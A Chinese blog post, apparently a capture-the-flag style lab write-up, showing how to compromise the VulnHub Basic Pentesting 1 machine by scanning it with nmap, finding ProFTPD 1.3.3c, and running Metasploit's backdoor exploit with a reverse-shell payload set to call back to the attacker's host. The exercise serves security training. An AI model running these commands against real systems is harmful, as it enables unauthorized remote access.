综合实战第一章-ftp系实战

靶场练习

发布日期: 2022-04-24

文章字数: 210

阅读次数: 11

综合实战第一章

ftp系实战

环境准备

靶场下载：https://www.vulnhub.com/entry/basic-pentesting-1,216/

攻击机:

kali 192.168.3.134

win7 192.168.3.137

靶机:BASIC_PENTESTING_1 192.168.3.174

信息搜集

nmap扫描

Linux

nmap -p- -A 192.168.3.174

image-20220508161830087

发现有21,22,80端口

看到了proftpd，可以看看有没有现成漏洞

搜索漏洞库

Linux

searchsploit ProFTPD 1.3.3c

image-20220508161932988

漏洞利用

打开msf，搜索相关漏洞

Linux

msfconsole
search ProFTPD 1.3.3c

image-20220508162233320

看到有个后门漏洞

使用这玩意

Linux

use exploit/unix/ftp/proftpd_133c_backdoor
show options

image-20220508162636364

设置参数

Linux

set rhosts 192.168.3.174

修改payload

Linux

set payload cmd/unix/reverse
set lhost 192.168.3.134
exploit

image-20220508163332502

推荐文章（由hexo文章推荐插件驱动）

Broken-year

http://Broken-year.github.io/2022/04/24/proftpd/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !

综合实战渗透测试靶场练习 FTP

综合实战第一章-SSI注入实战

2022-04-24 靶场练习

网络安全综合实战渗透测试靶场练习

综合实战第一章-smb信息泄露实战

2022-04-23 靶场练习

网络安全综合实战渗透测试靶场练习

综合实战第一章-ftp系实战

综合实战第一章

ftp系实战

环境准备

信息搜集

漏洞利用

推荐文章（由hexo文章推荐插件驱动）

微信扫一扫：分享

你的赏识是我前进的动力